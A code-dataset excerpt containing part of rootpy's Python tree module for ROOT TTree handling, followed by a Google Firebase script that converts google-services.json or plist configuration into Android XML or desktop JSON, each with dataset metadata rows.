raise TypeError("branches must be a list or tuple")
self._always_read = branches
@classmethod
def branch_type(cls, branch):
"""
Return the string representation for the type of a branch
"""
typename = branch.GetClassName()
if not typename:
leaf = branch.GetListOfLeaves()[0]
typename = leaf.GetTypeName()
# check if leaf has multiple elements
length = leaf.GetLen()
if length > 1:
typename = '{0}[{1:d}]'.format(typename, length)
return typename
@classmethod
def branch_is_supported(cls, branch):
"""
Currently the branch must only have one leaf but the leaf may have one
or multiple elements
"""
return branch.GetNleaves() == 1
def create_buffer(self, ignore_unsupported=False):
"""
Create this tree's TreeBuffer
"""
bufferdict = OrderedDict()
for branch in self.iterbranches():
# only include activated branches
if not self.GetBranchStatus(branch.GetName()):
continue
if not BaseTree.branch_is_supported(branch):
log.warning(
"ignore unsupported branch `{0}`".format(branch.GetName()))
continue
bufferdict[branch.GetName()] = Tree.branch_type(branch)
self.set_buffer(TreeBuffer(
bufferdict,
ignore_unsupported=ignore_unsupported))
def create_branches(self, branches):
"""
Create branches from a TreeBuffer or dict mapping names to type names
Parameters
----------
branches : TreeBuffer or dict
"""
if not isinstance(branches, TreeBuffer):
branches = TreeBuffer(branches)
self.set_buffer(branches, create_branches=True)
def update_buffer(self, treebuffer, transfer_objects=False):
"""
Merge items from a TreeBuffer into this Tree's TreeBuffer
Parameters
----------
treebuffer : rootpy.tree.buffer.TreeBuffer
The TreeBuffer to merge into this Tree's buffer
transfer_objects : bool, optional (default=False)
If True then all objects and collections on the input buffer will
be transferred to this Tree's buffer.
"""
self._buffer.update(treebuffer)
if transfer_objects:
self._buffer.set_objects(treebuffer)
def set_buffer(self, treebuffer,
branches=None,
ignore_branches=None,
create_branches=False,
visible=True,
ignore_missing=False,
ignore_duplicates=False,
transfer_objects=False):
"""
Set the Tree buffer
Parameters
----------
treebuffer : rootpy.tree.buffer.TreeBuffer
a TreeBuffer
branches : list, optional (default=None)
only include these branches from the TreeBuffer
ignore_branches : list, optional (default=None)
ignore these branches from the TreeBuffer
create_branches : bool, optional (default=False)
If True then the branches in the TreeBuffer should be created.
Use this option if initializing the Tree. A ValueError is raised
if an attempt is made to create a branch with the same name as one
that already exists in the Tree. If False the addresses of existing
branches will be set to point at the addresses in this buffer.
visible : bool, optional (default=True)
If True then the branches will be added to the buffer and will be
accessible as attributes of the Tree.
ignore_missing : bool, optional (default=False)
If True then any branches in this buffer that do not exist in the
Tree will be ignored, otherwise a ValueError will be raised. This
option is only valid when ``create_branches`` is False.
ignore_duplicates : bool, optional (default=False)
If False then raise a ValueError if the tree already has a branch
with the same name as an entry in the buffer. If True then skip
branches that already exist. This option is only valid when
``create_branches`` is True.
transfer_objects : bool, optional (default=False)
If True, all tree objects and collections will be transferred from
the buffer into this Tree's buffer.
"""
# determine branches to keep while preserving branch order
if branches is None:
branches = treebuffer.keys()
if ignore_branches is not None:
branches = [b for b in branches if b not in ignore_branches]
if create_branches:
for name in branches:
value = treebuffer[name]
if self.has_branch(name):
if ignore_duplicates:
log.warning(
"Skipping entry in buffer with the same name "
"as an existing branch: `{0}`".format(name))
continue
raise ValueError(
"Attempting to create two branches "
"with the same name: `{0}`".format(name))
if isinstance(value, Scalar):
self.Branch(name, value,
'{0}/{1}'.format(
name, value.type))
elif isinstance(value, Array):
self.Branch(name, value,
'{0}[{2:d}]/{1}'.format(
name, value.type, len(value)))
else:
self.Branch(name, value)
else:
for name in branches:
value = treebuffer[name]
if self.has_branch(name):
self.SetBranchAddress(name, value)
elif not ignore_missing:
raise ValueError(
"Attempting to set address for "
"branch `{0}` which does not exist".format(name))
else:
log.warning(
"Skipping entry in buffer for which no "
"corresponding branch in the "
"tree exists: `{0}`".format(name))
if visible:
newbuffer = TreeBuffer()
for branch in branches:
if branch in treebuffer:
newbuffer[branch] = treebuffer[branch]
newbuffer.set_objects(treebuffer)
self.update_buffer(newbuffer, transfer_objects=transfer_objects)
def activate(self, branches, exclusive=False):
"""
Activate branches
Parameters
----------
branches : str or list
branch or list of branches to activate
exclusive : bool, optional (default=False)
if True deactivate the remaining branches
"""
if exclusive:
self.SetBranchStatus('*', 0)
if isinstance(branches, basestring):
branches = [branches]
for branch in branches:
if '*' in branch:
matched_branches = self.glob(branch)
for b in matched_branches:
self.SetBranchStatus(b, 1)
elif self.has_branch(branch):
self.SetBranchStatus(branch, 1)
def deactivate(self, branches, exclusive=False):
"""
Deactivate branches
Parameters
----------
branches : str or list
branch or list of branches to deactivate
exclusive : bool, optional (default=False)
if True activate the remaining branches
"""
if exclusive:
self.SetBranchStatus('*', 1)
if isinstance(branches, basestring):
branches = [branches]
for branch in branches:
if '*' in branch:
matched_branches = self.glob(branch)
for b in matched_branches:
self.SetBranchStatus(b, 0)
elif self.has_branch(branch):
self.SetBranchStatus(branch, 0)
@property
def branches(self):
"""
List of the branches
"""
return [branch for branch in self.GetListOfBranches()]
def iterbranches(self):
"""
Iterator over the branches
"""
for branch in self.GetListOfBranches():
yield branch
@property
def branchnames(self):
"""
List of branch names
"""
return [branch.GetName() for branch in self.GetListOfBranches()]
def iterbranchnames(self):
"""
Iterator over the branch names
"""
for branch in self.iterbranches():
yield branch.GetName()
def glob(self, patterns, exclude=None):
"""
Return a list of branch names that match ``pattern``.
Exclude all matched branch names which also match a pattern in
``exclude``. ``exclude`` may be a string or list of strings.
Parameters
----------
patterns: str or list
branches are matched against this pattern or list of patterns where
globbing is performed with '*'.
exclude : str or list, optional (default=None)
branches matching this pattern or list of patterns are excluded
even if they match a pattern in ``patterns``.
Returns
-------
matches : list
List of matching branch names
"""
if isinstance(patterns, basestring):
patterns = [patterns]
if isinstance(exclude, basestring):
exclude = [exclude]
matches = []
for pattern in patterns:
matches += fnmatch.filter(self.iterbranchnames(), pattern)
if exclude is not None:
for exclude_pattern in exclude:
matches = [match for match in matches
if not fnmatch.fnmatch(match, exclude_pattern)]
return matches
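# Illustrative sketch (added commentary, not original rootpy code): given a tree
# with branches such as 'el_pt', 'el_eta' and 'mu_pt' (branch names are only
# assumptions), the call below would return ['el_pt', 'el_eta']:
#
#   electron_branches = tree.glob('el_*', exclude='el_*_syst')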
def __getitem__(self, item):
"""
Get an entry in the tree or a branch
Parameters
----------
item : str or int
if item is a str then return the value of the branch with that name
if item is an int then call GetEntry
"""
if isinstance(item, basestring):
return self._buffer[item]
self.GetEntry(item)
return self
def GetEntry(self, entry):
"""
Get an entry. Tree collections are reset
(see ``rootpy.tree.treeobject``)
Parameters
----------
entry : int
entry index
Returns
-------
ROOT.TTree.GetEntry : int
The number of bytes read
"""
if not (0 <= entry < self.GetEntries()):
raise IndexError("entry index out of range: {0:d}".format(entry))
self._buffer.reset_collections()
return super(BaseTree, self).GetEntry(entry)
def __iter__(self):
"""
Iterator over the entries in the Tree.
"""
if not self._buffer:
self.create_buffer()
if self.read_branches_on_demand:
self._buffer.set_tree(self)
# drop all branches from the cache
self.DropBranchFromCache('*')
for attr in self._always_read:
try:
branch = self._branch_cache[attr]
except KeyError: # one-time hit
branch = self.GetBranch(attr)
if not branch:
raise AttributeError(
"branch `{0}` specified in "
"`always_read` does not exist".format(attr))
self._branch_cache[attr] = branch
# add branches that we should always read to cache
self.AddBranchToCache(branch)
for i in xrange(self.GetEntries()):
# Only increment current entry.
# getattr on a branch will then GetEntry on only that branch
# see ``TreeBuffer.get_with_read_if_cached``.
self._current_entry = i
self.LoadTree(i)
for attr in self._always_read:
# Always read branches in ``self._always_read`` since
# these branches may never be getattr'd but the TreeBuffer
# should always be updated to reflect their current values.
# This is useful if you are iterating over an input tree
# and writing to an output tree that shares the same
# TreeBuffer but you don't getattr on all branches of the
# input tree in the logic that determines which entries
# to keep.
self._branch_cache[attr].GetEntry(i)
self._buffer._entry.set(i)
yield self._buffer
self._buffer.next_entry()
self._buffer.reset_collections()
else:
for i in xrange(self.GetEntries()):
# Read all activated branches (can be slow!).
super(BaseTree, self).GetEntry(i)
self._buffer._entry.set(i)
yield self._buffer
self._buffer.reset_collections()
def __setattr__(self, attr, value):
if '_inited' not in self.__dict__ or attr in self.__dict__:
return super(BaseTree, self).__setattr__(attr, value)
try:
return self._buffer.__setattr__(attr, value)
except AttributeError:
raise AttributeError(
"`{0}` instance has no attribute `{1}`".format(
self.__class__.__name__, attr))
def __getattr__(self, attr):
if '_inited' not in self.__dict__:
raise AttributeError(
"`{0}` instance has no attribute `{1}`".format(
self.__class__.__name__, attr))
try:
return getattr(self._buffer, attr)
except AttributeError:
raise AttributeError(
"`{0}` instance has no attribute `{1}`".format(
self.__class__.__name__, attr))
def __setitem__(self, item, value):
self._buffer[item] = value
def __len__(self):
"""
Same as GetEntries
"""
return self.GetEntries()
def __contains__(self, branch):
"""
Same as has_branch
"""
return self.has_branch(branch)
def has_branch(self, branch):
"""
Determine if this Tree contains a branch with the name ``branch``
Parameters
----------
branch : str
branch name
Returns
-------
has_branch : bool
True if this Tree contains a branch with the name ``branch`` or
False otherwise.
"""
return not not self.GetBranch(branch)
def csv(self, sep=',', branches=None,
include_labels=True, limit=None,
stream=None):
"""
Print csv representation of tree only including branches
of basic types (no objects, vectors, etc..)
Parameters
----------
sep : str, optional (default=',')
The delimiter used to separate columns
branches : list, optional (default=None)
Only include these branches in the CSV output. If None, then all
basic types will be included.
include_labels : bool, optional (default=True)
Include a first row of branch names labelling each column.
limit : int, optional (default=None)
Only include up to a maximum of ``limit`` rows in the CSV.
stream : file, (default=None)
Stream to write the CSV output on. By default the CSV will be
written to ``sys.stdout``.
"""
if stream is None:
stream = sys.stdout
if not self._buffer:
self.create_buffer(ignore_unsupported=True)
if branches is None:
branchdict = OrderedDict([
(name, self._buffer[name])
for name in self.iterbranchnames()
if isinstance(self._buffer[name], (Scalar, Array))])
else:
branchdict = OrderedDict()
for name in branches:
if not isinstance(self._buffer[name], (Scalar, Array)):
raise TypeError(
"selected branch `{0}` "
"is not a scalar or array type".format(name))
branchdict[name] = self._buffer[name]
if not branchdict:
raise RuntimeError(
"no branches selected or no "
"branches of scalar or array types exist")
if include_labels:
# expand array types to f[0],f[1],f[2],...
print >> stream, sep.join(
name if isinstance(value, (Scalar, BaseChar))
else sep.join('{0}[{1:d}]'.format(name, idx)
for idx in xrange(len(value)))
for name, value in branchdict.items())
# even though 'entry' is not used, enumerate or simply iterating over
# self is required to update the buffer with the new branch values at
# each tree entry.
for i, entry in enumerate(self):
print >> stream, sep.join(
str(v.value) if isinstance(v, (Scalar, BaseChar))
else sep.join(map(str, v))
for v in branchdict.values())
if limit is not None and i + 1 == limit:
break
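# Illustrative sketch (added commentary, not original rootpy code): write the
# first 10 entries of a few scalar branches as tab-separated values; the branch
# names and output file are assumptions for illustration.
#
#   with open('dump.tsv', 'w') as out:
#       tree.csv(sep='\t', branches=['run', 'lumi', 'evt'], limit=10, stream=out)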
def Scale(self, value):
"""
Scale the weight of the Tree by ``value``
Parameters
----------
value : int, float
Scale the Tree weight by this value
"""
self.SetWeight(self.GetWeight() * value)
def GetEntries(self, cut=None, weighted_cut=None, weighted=False):
"""
Get the number of (weighted) entries in the Tree
Parameters
----------
cut : str or rootpy.tree.cut.Cut, optional (default=None)
Only entries passing this cut will be included in the count
weighted_cut : str or rootpy.tree.cut.Cut, optional (default=None)
Apply a weighted selection and determine the weighted number of
entries.
weighted : bool, optional (default=False)
Multiply the number of (weighted) entries by the Tree weight.
"""
if weighted_cut:
hist = Hist(1, -1, 2)
branch = self.GetListOfBranches()[0].GetName()
weight = self.GetWeight()
self.SetWeight(1)
self.Draw('{0}=={1}>>{2}'.format(branch, branch, hist.GetName()),
weighted_cut * cut)
self.SetWeight(weight)
entries = hist.Integral()
elif cut:
entries = super(BaseTree, self).GetEntries(str(cut))
else:
entries = super(BaseTree, self).GetEntries()
if weighted:
entries *= self.GetWeight()
return entries
def GetMaximum(self, expression, cut=None):
"""
TODO: we need a better way of determining the maximum value of an
expression.
"""
if cut:
self.Draw(expression, cut, 'goff')
else:
self.Draw(expression, '', 'goff')
vals = self.GetV1()
n = self.GetSelectedRows()
vals = [vals[i] for i in xrange(min(n, 10000))]
return max(vals)
def GetMinimum(self, expression, cut=None):
"""
TODO: we need a better way of determining the minimum value of an
expression.
"""
if cut:
self.Draw(expression, cut, "goff")
else:
self.Draw(expression, "", "goff")
vals = self.GetV1()
n = self.GetSelectedRows()
vals = [vals[i] for i in xrange(min(n, 10000))]
return min(vals)
def CopyTree(self, selection, *args, **kwargs):
"""
Copy the tree while supporting a rootpy.tree.cut.Cut selection in
addition to a simple string.
"""
return super(BaseTree, self).CopyTree(str(selection), *args, **kwargs)
def reset_branch_values(self):
"""
Reset all values in the buffer to their default values
"""
self._buffer.reset()
@method_file_cd
def Write(self, *args, **kwargs):
super(BaseTree, self).Write(*args, **kwargs)
def Draw(self,
expression,
selection="",
options="",
hist=None,
create_hist=False,
**kwargs):
"""
Draw a TTree with a selection as usual, but return the created
histogram.
Parameters
----------
expression : str
The expression to draw. Multidimensional expressions are separated
by ":". rootpy reverses the expressions along each dimension so the
order matches the order of the elements identifying a location in
the resulting histogram. By default ROOT takes the expression "Y:X"
to mean Y versus X but we argue that this is counterintuitive and
that the order should be "X:Y" so that the expression along the
first dimension identifies the location along the first axis, etc.
selection : str or rootpy.tree.Cut, optional (default="")
The cut expression. Only entries satisfying this selection are
included in the filled histogram.
options : str, optional (default="")
Draw options passed to ROOT.TTree.Draw
hist : ROOT.TH1, optional (default=None)
The histogram to be filled. If not specified, rootpy will attempt
to find what ROOT created and return that.
create_hist : bool (default=False)
If True and ``hist`` is not specified and a histogram name is not
specified in the draw expression, then override ROOT's
default behaviour and fill a new histogram. ROOT will otherwise add
points to a TGraph or TPolyMarker3D if not drawing in more than
two dimensions.
kwargs : dict, optional
Remaining keyword arguments are used to set the style attributes of
the histogram.
Returns
-------
If ``hist`` is specified, None is returned. If ``hist`` is left
unspecified, an attempt is made to retrieve the generated histogram
which is then returned.
"""
# Check that we have a valid draw expression and pick out components
exprmatch = re.match(BaseTree.DRAW_PATTERN, expression)
if not exprmatch:
raise ValueError(
"not a valid draw expression: `{0}`".format(expression))
# Reverse variable order to match order in hist constructor
exprdict = exprmatch.groupdict()
fields = exprdict['branches'].split(':')
num_dimensions = len(fields)
expression = ':'.join(fields[:3][::-1] + fields[3:])
if exprdict['redirect'] is not None:
expression += exprdict['redirect']
if not isinstance(selection, Cut):
# Let Cut handle any extra processing (i.e. ternary operators)
selection = Cut(selection)
graphics = 'goff' not in options
if hist is not None:
if not isinstance(hist, ROOT.TH1):
raise TypeError("Cannot draw into a `{0}`".format(type(hist)))
# Check that the dimensionality of the expression and object match
if num_dimensions != hist.GetDimension():
raise TypeError(
"The dimensionality of the expression `{0}` ({1:d}) "
"does not match the dimensionality of a `{2}`".format(
expression, num_dimensions, hist.__class__.__name__))
# Handle graphics ourselves
if graphics:
if options:
options += ' '
options += 'goff'
if exprdict['name'] is None:
# Draw into histogram supplied by user
expression = '{0}>>+{1}'.format(expression, hist.GetName())
else:
if exprdict['name'] != hist.GetName():
# If the user specified a name to draw into then check that
# this is consistent with the specified object.
raise ValueError(
"The name specified in the draw "
"expression `{0}` does not match the "
"name of the specified object `{1}`".format(
exprdict['name'],
hist.GetName()))
# Check that binning is not specified
if exprdict['binning'] is not None:
raise ValueError(
"When specifying the object to draw into, do not "
"specify a binning in the draw expression")
else:
if create_hist and exprdict['name'] is None:
if num_dimensions > 4:
raise ValueError(
"Cannot create a histogram for expressions with "
"more than 4 dimensions")
newname = uuid.uuid4().hex
expression += '>>{0}'.format(newname)
exprdict['name'] = newname
pad = ROOT.gPad.func()
own_pad = False
if graphics and not pad:
# Create a new canvas if one doesn't exist yet
own_pad = True
pad = Canvas()
# Note: TTree.Draw() pollutes gDirectory, make a temporary one
with thread_specific_tmprootdir():
if hist is not None:
# If a custom histogram is specified (i.e, it's not being
# created root side), then temporarily put it into the
# temporary thread-specific directory.
context = set_directory(hist)
else:
context = do_nothing()
with context:
super(BaseTree, self).Draw(expression, selection, options)
if hist is None:
# Retrieve histogram made by TTree.Draw
if num_dimensions == 1 or exprdict['name'] is not None:
# a TH1
hist = asrootpy(self.GetHistogram(), warn=False)
elif num_dimensions == 2:
# a TGraph
hist = asrootpy(pad.GetPrimitive('Graph'), warn=False)
else:
# ROOT: For a three and four dimensional Draw the TPolyMarker3D
# is unnamed, and cannot be retrieved. Why, ROOT?
log.warning(
"Cannot retrieve the TPolyMarker3D for "
"3D and 4D expressions")
if graphics and own_pad:
# Since we cannot access the TPolyMarker3D we use self to
# keep the canvas alive
keepalive(self, pad)
if hist: # is not None
if isinstance(hist, Plottable):
hist.decorate(**kwargs)
# ROOT, don't try to delete this object! (See issue #277)
hist.SetBit(ROOT.kCanDelete, False)
if graphics:
if own_pad:
# The usual bug is that the histogram is garbage
# collected and we want the canvas to keep the
# histogram alive, but here the canvas has been
# created locally and we are returning the histogram,
# so we want the histogram to keep the canvas alive.
keepalive(hist, pad)
# Redraw the histogram since we may have specified style
# attributes in **kwargs
hist.Draw()
if graphics:
pad.Modified()
pad.Update()
return hist
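# Illustrative sketch (added commentary, not original rootpy code): note the
# "X:Y" ordering documented above, which rootpy reverses before handing the
# expression to ROOT. The branch names, binning and cut are assumptions.
#
#   h2 = tree.Draw('jet_pt:jet_eta>>h(50, 0, 500, 50, -2.5, 2.5)',
#                  selection='jet_pt > 30', options='goff')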
def to_array(self, *args, **kwargs):
"""
Convert this tree into a NumPy structured array
"""
from root_numpy import tree2array
return tree2array(self, *args, **kwargs)
@snake_case_methods
class Tree(BaseTree, QROOT.TTree):
"""
Inherits from TTree so all regular TTree methods are available
but certain methods (i.e. Draw) have been overridden
to improve usage in Python.
Parameters
----------
name : str, optional (default=None)
The Tree name (a UUID if None)
title : str, optional (default=None)
The Tree title (empty string if None)
model : TreeModel, optional (default=None)
If specified then this TreeModel will be used to create the branches
"""
_ROOT = QROOT.TTree
@method_file_check
def __init__(self, name=None, title=None, model=None):
super(Tree, self).__init__(name=name, title=title)
self._buffer = TreeBuffer()
if model is not None:
if not issubclass(model, TreeModel):
raise TypeError("the model must subclass TreeModel")
self.set_buffer(model(), create_branches=True)
self._post_init()
def Fill(self, reset=False):
"""
Fill the Tree with the current values in the buffer
Parameters
----------
reset : bool, optional (default=False)
Reset the values in the buffer to their default values after
filling.
"""
super(Tree, self).Fill()
# reset all branches
if reset:
self._buffer.reset()
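# Illustrative sketch (added commentary, not original rootpy code): creating and
# filling a Tree via create_branches with a dict of ROOT type names, the same
# kind of names create_buffer derives from existing branches above. The branch
# names, types and values are assumptions for illustration.
#
#   tree = Tree('events')
#   tree.create_branches({'x': 'Float_t', 'n': 'Int_t'})
#   for i in range(100):
#       tree.x = i * 0.5
#       tree.n = i
#       tree.Fill(reset=True)
#   tree.Write()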
@snake_case_methods
class Ntuple(BaseTree, QROOT.TNtuple):
"""
Inherits from TNtuple so all regular TNtuple/TTree methods are available
but certain methods (i.e. Draw) have been overridden
to improve usage in Python.
Parameters
----------
varlist : list of str
A list of the field names
name : str, optional (default=None)
The Ntuple name (a UUID if None)
title : str, optional (default=None)
The Ntuple title (empty string if None)
bufsize : int, optional (default=32000)
Basket buffer size
"""
_ROOT = QROOT.TNtuple
@method_file_check
def __init__(self, varlist, name=None, title=None, bufsize=32000):
super(Ntuple, self).__init__(':'.join(varlist), bufsize,
name=name,
title=title)
self._post_init()
|
gpl-3.0
| -4,759,378,811,842,880,000
| 36.006623
| 79
| 0.547691
| false
| 4.87184
| false
| false
| false
|
Jason-Zhao-Jie/MagicTower
|
Assets/Firebase/Editor/generate_xml_from_google_services_json.py
|
1
|
13865
|
#!/usr/bin/python
# Copyright 2016 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Stand-alone implementation of the Gradle Firebase plugin.
Converts the services json file to xml:
https://googleplex-android.googlesource.com/platform/tools/base/+/studio-master-dev/build-system/google-services/src/main/groovy/com/google/gms/googleservices
"""
__author__ = 'Wouter van Oortmerssen'
import argparse
import json
import os
import sys
from xml.etree import ElementTree
# Input filename if it isn't set.
DEFAULT_INPUT_FILENAME = 'app/google-services.json'
# Output filename if it isn't set.
DEFAULT_OUTPUT_FILENAME = 'res/values/googleservices.xml'
# Input filename for .plist files, if it isn't set.
DEFAULT_PLIST_INPUT_FILENAME = 'GoogleService-Info.plist'
# Output filename for .json files, if it isn't set.
DEFAULT_JSON_OUTPUT_FILENAME = 'google-services-desktop.json'
# Indicates a web client in the oauth_client list.
OAUTH_CLIENT_TYPE_WEB = 3
def read_xml_value(xml_node):
"""Utility method for reading values from the plist XML.
Args:
xml_node: An ElementTree node, that contains a value.
Returns:
The value of the node, or None, if it could not be read.
"""
if xml_node.tag == 'string':
return xml_node.text
elif xml_node.tag == 'integer':
return int(xml_node.text)
elif xml_node.tag == 'real':
return float(xml_node.text)
elif xml_node.tag == 'false':
return 0
elif xml_node.tag == 'true':
return 1
else:
# other types of input are ignored. (data, dates, arrays, etc.)
return None
def construct_plist_dictionary(xml_root):
"""Constructs a dictionary of values based on the contents of a plist file.
Args:
xml_root: An ElementTree node, that represents the root of the xml file
that is to be parsed. (Which should be a dictionary containing
key-value pairs of the properties that need to be extracted.)
Returns:
A dictionary, containing key-value pairs for all (supported) entries in the
node.
"""
xml_dict = xml_root.find('dict')
if xml_dict is None:
return None
plist_dict = {}
i = 0
while i < len(xml_dict):
if xml_dict[i].tag == 'key':
key = xml_dict[i].text
i += 1
if i < len(xml_dict):
value = read_xml_value(xml_dict[i])
if value is not None:
plist_dict[key] = value
i += 1
return plist_dict
def construct_google_services_json(xml_dict):
"""Constructs a google services json file from a dictionary.
Args:
xml_dict: A dictionary of all the key/value pairs that are needed for the
output json file.
Returns:
A string representing the output json file.
"""
try:
json_struct = {
'project_info': {
'project_number': xml_dict['GCM_SENDER_ID'],
'firebase_url': xml_dict['DATABASE_URL'],
'project_id': xml_dict['PROJECT_ID'],
'storage_bucket': xml_dict['STORAGE_BUCKET']
},
'client': [{
'client_info': {
'mobilesdk_app_id': xml_dict['GOOGLE_APP_ID'],
'android_client_info': {
'package_name': xml_dict['BUNDLE_ID']
}
},
'oauth_client': [{
'client_id': xml_dict['CLIENT_ID'],
}],
'api_key': [{
'current_key': xml_dict['API_KEY']
}],
'services': {
'analytics_service': {
'status': xml_dict['IS_ANALYTICS_ENABLED']
},
'appinvite_service': {
'status': xml_dict['IS_APPINVITE_ENABLED']
}
}
},],
'configuration_version':
'1'
}
return json.dumps(json_struct, indent=2)
except KeyError as e:
sys.stderr.write('Could not find key in plist file: [%s]\n' % (e.args[0]))
return None
def convert_plist_to_json(plist_string, input_filename):
"""Converts an input plist string into a .json file and saves it.
Args:
plist_string: The contents of the loaded plist file.
input_filename: The file name that the plist data was read from.
Returns:
the converted string, or None if there were errors.
"""
try:
root = ElementTree.fromstring(plist_string)
except ElementTree.ParseError:
sys.stderr.write('Error parsing file %s.\n'
'It does not appear to be valid XML.\n' % (input_filename))
return None
plist_dict = construct_plist_dictionary(root)
if plist_dict is None:
sys.stderr.write('In file %s, could not locate a top-level \'dict\' '
'element.\n'
'File format should be plist XML, with a top-level '
'dictionary containing project settings as key-value '
'pairs.\n' % (input_filename))
return None
json_string = construct_google_services_json(plist_dict)
return json_string
def gen_string(parent, name, text):
"""Generate one <string /> element and put into the list of keeps.
Args:
parent: The object that will hold the string.
name: The name to store the string under.
text: The text of the string.
"""
if text:
prev = parent.get('tools:keep', '')
if prev:
prev += ','
parent.set('tools:keep', prev + '@string/' + name)
child = ElementTree.SubElement(parent, 'string', {
'name': name,
'translatable': 'false'
})
child.text = text
def indent(elem, level=0):
"""Recurse through XML tree and add indentation.
Args:
elem: The element to recurse over
level: The current indentation level.
"""
i = '\n' + level*' '
if elem is not None:
if not elem.text or not elem.text.strip():
elem.text = i + ' '
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
indent(elem, level+1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
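# Illustrative sketch (added commentary, not part of the original script):
# gen_string() and indent() combine to produce the strings XML; the resource
# name, value and output path below are assumptions for illustration.
#
#   demo_root = ElementTree.Element('resources')
#   gen_string(demo_root, 'google_app_id', '1:1234567890:android:abc123')
#   indent(demo_root)
#   ElementTree.ElementTree(demo_root).write('res/values/googleservices.xml',
#                                            'utf-8', True)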
def main():
parser = argparse.ArgumentParser(
description=((
'Converts a Firebase %s into %s similar to the Gradle plugin, or '
'converts a Firebase %s into a %s suitable for use on desktop apps.' %
(DEFAULT_INPUT_FILENAME, DEFAULT_OUTPUT_FILENAME,
DEFAULT_PLIST_INPUT_FILENAME, DEFAULT_JSON_OUTPUT_FILENAME))))
parser.add_argument('-i', help='Override input file name',
metavar='FILE', required=False)
parser.add_argument('-o', help='Override destination file name',
metavar='FILE', required=False)
parser.add_argument('-p', help=('Package ID to select within the set of '
'packages in the input file. If this is '
'not specified, the first package in the '
'input file is selected.'))
parser.add_argument('-l', help=('List all package IDs referenced by the '
'input file. If this is specified, '
'the output file is not created.'),
action='store_true', default=False, required=False)
parser.add_argument('-f', help=('Print project fields from the input file '
'in the form \'name=value\\n\' for each '
'field. If this is specified, the output '
'is not created.'),
action='store_true', default=False, required=False)
parser.add_argument(
'--plist',
help=(
'Specifies a plist file to convert to a JSON configuration file. '
'If this is enabled, the script will expect a .plist file as input, '
'which it will convert into a %s file. The output file is '
'*not* suitable for use with Firebase on Android.' %
(DEFAULT_JSON_OUTPUT_FILENAME)),
action='store_true',
default=False,
required=False)
args = parser.parse_args()
if args.plist:
input_filename = DEFAULT_PLIST_INPUT_FILENAME
output_filename = DEFAULT_JSON_OUTPUT_FILENAME
else:
input_filename = DEFAULT_INPUT_FILENAME
output_filename = DEFAULT_OUTPUT_FILENAME
if args.i:
input_filename = args.i
if args.o:
output_filename = args.o
with open(input_filename, 'r') as ifile:
file_string = ifile.read()
json_string = None
if args.plist:
json_string = convert_plist_to_json(file_string, input_filename)
if json_string is None:
return 1
jsobj = json.loads(json_string)
else:
jsobj = json.loads(file_string)
root = ElementTree.Element('resources')
root.set('xmlns:tools', 'http://schemas.android.com/tools')
project_info = jsobj.get('project_info')
if project_info:
gen_string(root, 'firebase_database_url', project_info.get('firebase_url'))
gen_string(root, 'gcm_defaultSenderId', project_info.get('project_number'))
gen_string(root, 'google_storage_bucket',
project_info.get('storage_bucket'))
gen_string(root, 'project_id', project_info.get('project_id'))
if args.f:
if not project_info:
sys.stderr.write('No project info found in %s.' % input_filename)
return 1
for field, value in project_info.iteritems():
sys.stdout.write('%s=%s\n' % (field, value))
return 0
packages = set()
client_list = jsobj.get('client')
if client_list:
# Search for the user specified package in the file.
selected_package_name = ''
selected_client = client_list[0]
find_package_name = args.p
for client in client_list:
package_name = client.get('client_info', {}).get(
'android_client_info', {}).get('package_name', '')
if not package_name:
package_name = client.get('oauth_client', {}).get(
'android_info', {}).get('package_name', '')
if package_name:
if not selected_package_name:
selected_package_name = package_name
selected_client = client
if package_name == find_package_name:
selected_package_name = package_name
selected_client = client
packages.add(package_name)
if args.p and selected_package_name != find_package_name:
sys.stderr.write('No packages found in %s which match the package '
'name %s\n'
'\n'
'Found the following:\n'
'%s\n' % (input_filename, find_package_name,
'\n'.join(packages)))
return 1
client_api_key = selected_client.get('api_key')
if client_api_key:
client_api_key0 = client_api_key[0]
gen_string(root, 'google_api_key', client_api_key0.get('current_key'))
gen_string(root, 'google_crash_reporting_api_key',
client_api_key0.get('current_key'))
client_info = selected_client.get('client_info')
if client_info:
gen_string(root, 'google_app_id', client_info.get('mobilesdk_app_id'))
oauth_client_list = selected_client.get('oauth_client')
if oauth_client_list:
for oauth_client in oauth_client_list:
client_type = oauth_client.get('client_type')
client_id = oauth_client.get('client_id')
if client_type and client_type == OAUTH_CLIENT_TYPE_WEB and client_id:
gen_string(root, 'default_web_client_id', client_id)
# Only include the first matching OAuth web client ID.
break
services = selected_client.get('services')
if services:
ads_service = services.get('ads_service')
if ads_service:
gen_string(root, 'test_banner_ad_unit_id',
ads_service.get('test_banner_ad_unit_id'))
gen_string(root, 'test_interstitial_ad_unit_id',
ads_service.get('test_interstitial_ad_unit_id'))
analytics_service = services.get('analytics_service')
if analytics_service:
analytics_property = analytics_service.get('analytics_property')
if analytics_property:
gen_string(root, 'ga_trackingId',
analytics_property.get('tracking_id'))
# enable this once we have an example of this service being present
# in the json data:
maps_service_enabled = False
if maps_service_enabled:
maps_service = services.get('maps_service')
if maps_service:
maps_api_key = maps_service.get('api_key')
if maps_api_key:
for k in range(0, len(maps_api_key)):
# generates potentially multiple of these keys, which is
# the same behavior as the java plugin.
gen_string(root, 'google_maps_key',
maps_api_key[k].get('maps_api_key'))
tree = ElementTree.ElementTree(root)
indent(root)
if args.l:
for package in packages:
if package:
sys.stdout.write(package + '\n')
else:
path = os.path.dirname(output_filename)
if path and not os.path.exists(path):
os.makedirs(path)
if not args.plist:
tree.write(output_filename, 'utf-8', True)
else:
with open(output_filename, 'w') as ofile:
ofile.write(json_string)
return 0
if __name__ == '__main__':
sys.exit(main())
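# Illustrative usage (added commentary, not part of the original script); the
# file paths are assumptions for illustration:
#
#   python generate_xml_from_google_services_json.py \
#       -i app/google-services.json -o res/values/googleservices.xml
#
#   python generate_xml_from_google_services_json.py --plist \
#       -i GoogleService-Info.plist -o google-services-desktop.json
#
#   python generate_xml_from_google_services_json.py -l   # list package IDs only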
|
bsd-3-clause
| 2,530,400,691,713,250,300
| 33.150246
| 158
